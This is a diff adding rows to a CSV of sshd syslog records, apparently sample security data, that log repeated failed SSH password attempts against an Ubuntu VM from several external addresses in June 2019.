+9848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:27,UbuntuDevEnv,2019-06-25 22:48:26,auth,UbuntuDevEnv,info,Failed password for invalid user files from 139.199.113.140 port 42030 ssh2,50030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,139.199.113.1,42030,,
+9849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:27,UbuntuDevEnv,2019-06-25 22:48:26,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 42030:11: Bye Bye [preauth],50030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,42030,,
+9850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:27,UbuntuDevEnv,2019-06-25 22:48:26,auth,UbuntuDevEnv,info,Disconnected from invalid user files 139.199.113.140 port 42030 [preauth],50030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,139.199.113.1,42030,,
+9851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:29,UbuntuDevEnv,2019-06-25 22:48:28,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20221 ssh2,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20221,,
+9852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:38,UbuntuDevEnv,2019-06-25 22:48:36,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 20221 ssh2],49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20221,,
+9853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:38,UbuntuDevEnv,2019-06-25 22:48:37,auth,UbuntuDevEnv,info,Connection closed by 198.108.66.96 port 1918 [preauth],50061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,198.108.66.9,1918,,
+9854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:39,UbuntuDevEnv,2019-06-25 22:48:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20221 ssh2,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20221,,
+9855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:39,UbuntuDevEnv,2019-06-25 22:48:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:39,UbuntuDevEnv,2019-06-25 22:48:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 20221: Too many authentication failures [preauth],49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,20221,,
+9857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:39,UbuntuDevEnv,2019-06-25 22:48:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:39,UbuntuDevEnv,2019-06-25 22:48:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 20221 ssh2 [preauth],49989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20221,,
+9859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:52,UbuntuDevEnv,2019-06-25 22:48:51,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.175 port 37846:11:  [preauth],50102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,37846,,
+9860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:48:52,UbuntuDevEnv,2019-06-25 22:48:51,auth,UbuntuDevEnv,info,Disconnected from 218.92.0.175 port 37846 [preauth],50102,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,37846,,
+9861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:02,UbuntuDevEnv,2019-06-25 22:49:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:04,UbuntuDevEnv,2019-06-25 22:49:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 44732 ssh2,50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,44732,,
+9863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:04,UbuntuDevEnv,2019-06-25 22:49:04,auth,UbuntuDevEnv,info,Invalid user user from 77.232.128.87 port 49165,50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,77.232.128.8,49165,,
+9864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:04,UbuntuDevEnv,2019-06-25 22:49:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:04,UbuntuDevEnv,2019-06-25 22:49:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:06,UbuntuDevEnv,2019-06-25 22:49:05,auth,UbuntuDevEnv,info,Failed password for invalid user user from 77.232.128.87 port 49165 ssh2,50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,77.232.128.8,49165,,
+9867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:06,UbuntuDevEnv,2019-06-25 22:49:05,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 49165:11: Bye Bye [preauth],50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,49165,,
+9868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:06,UbuntuDevEnv,2019-06-25 22:49:05,auth,UbuntuDevEnv,info,Disconnected from invalid user user 77.232.128.87 port 49165 [preauth],50178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,77.232.128.8,49165,,
+9869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:06,UbuntuDevEnv,2019-06-25 22:49:06,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 44732 ssh2,50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,44732,,
+9870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:13,UbuntuDevEnv,2019-06-25 22:49:13,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 44732 ssh2],50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,44732,,
+9871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:16,UbuntuDevEnv,2019-06-25 22:49:16,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 44732 ssh2,50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,44732,,
+9872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:16,UbuntuDevEnv,2019-06-25 22:49:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 44732 ssh2 [preauth],50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,44732,,
+9873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:16,UbuntuDevEnv,2019-06-25 22:49:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:16,UbuntuDevEnv,2019-06-25 22:49:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 44732: Too many authentication failures [preauth],50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,44732,,
+9875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:16,UbuntuDevEnv,2019-06-25 22:49:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:20,UbuntuDevEnv,2019-06-25 22:49:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:22,UbuntuDevEnv,2019-06-25 22:49:21,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 61128 ssh2,50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61128,,
+9878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:23,UbuntuDevEnv,2019-06-25 22:49:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79  user=root,50251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,178.62.54.7,,0,
+9879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:24,UbuntuDevEnv,2019-06-25 22:49:23,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 61128 ssh2,50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61128,,
+9880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:24,UbuntuDevEnv,2019-06-25 22:49:24,auth,UbuntuDevEnv,info,Failed password for root from 178.62.54.79 port 52086 ssh2,50251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,52086,,
+9881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:24,UbuntuDevEnv,2019-06-25 22:49:24,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 178.62.54.79 port 52086 [preauth],50251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,178.62.54.7,52086,,
+9882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:24,UbuntuDevEnv,2019-06-25 22:49:24,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 52086:11: Bye Bye [preauth],50251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,52086,,
+9883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:27,UbuntuDevEnv,2019-06-25 22:49:26,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 61128 ssh2,50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61128,,
+9884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:35,UbuntuDevEnv,2019-06-25 22:49:34,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:35,UbuntuDevEnv,2019-06-25 22:49:34,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 61128 ssh2 [preauth],50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61128,,
+9886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:35,UbuntuDevEnv,2019-06-25 22:49:34,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 61128 ssh2],50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61128,,
+9887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:35,UbuntuDevEnv,2019-06-25 22:49:34,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 61128: Too many authentication failures [preauth],50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,61128,,
+9888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:35,UbuntuDevEnv,2019-06-25 22:49:34,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:38,UbuntuDevEnv,2019-06-25 22:49:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:39,UbuntuDevEnv,2019-06-25 22:49:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 7899 ssh2,50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7899,,
+9891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:51,UbuntuDevEnv,2019-06-25 22:49:50,auth,UbuntuDevEnv,info,Invalid user ftptest from 139.199.113.140 port 56440,50352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,139.199.113.1,56440,,
+9892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:51,UbuntuDevEnv,2019-06-25 22:49:50,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 7899 ssh2],50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7899,,
+9893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:51,UbuntuDevEnv,2019-06-25 22:49:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:51,UbuntuDevEnv,2019-06-25 22:49:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,50352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:52,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 7899 ssh2 [preauth],50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7899,,
+9896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:52,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 7899 ssh2,50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7899,,
+9897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:52,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:52,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 7899: Too many authentication failures [preauth],50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,7899,,
+9899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:52,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:53,auth,UbuntuDevEnv,info,Failed password for invalid user ftptest from 139.199.113.140 port 56440 ssh2,50352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,139.199.113.1,56440,,
+9901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:53,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 56440:11: Bye Bye [preauth],50352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,56440,,
+9902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:53,UbuntuDevEnv,2019-06-25 22:49:53,auth,UbuntuDevEnv,info,Disconnected from invalid user ftptest 139.199.113.140 port 56440 [preauth],50352,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,139.199.113.1,56440,,
+9903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:55,UbuntuDevEnv,2019-06-25 22:49:54,auth,UbuntuDevEnv,info,Invalid user bolognesi from 152.250.252.179 port 44232,50367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bolognesi,152.250.252.1,44232,,
+9904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:55,UbuntuDevEnv,2019-06-25 22:49:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,50367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:55,UbuntuDevEnv,2019-06-25 22:49:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:57,UbuntuDevEnv,2019-06-25 22:49:56,auth,UbuntuDevEnv,info,Failed password for invalid user bolognesi from 152.250.252.179 port 44232 ssh2,50367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bolognesi,152.250.252.1,44232,,
+9907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:57,UbuntuDevEnv,2019-06-25 22:49:57,auth,UbuntuDevEnv,info,Disconnected from invalid user bolognesi 152.250.252.179 port 44232 [preauth],50367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bolognesi,152.250.252.1,44232,,
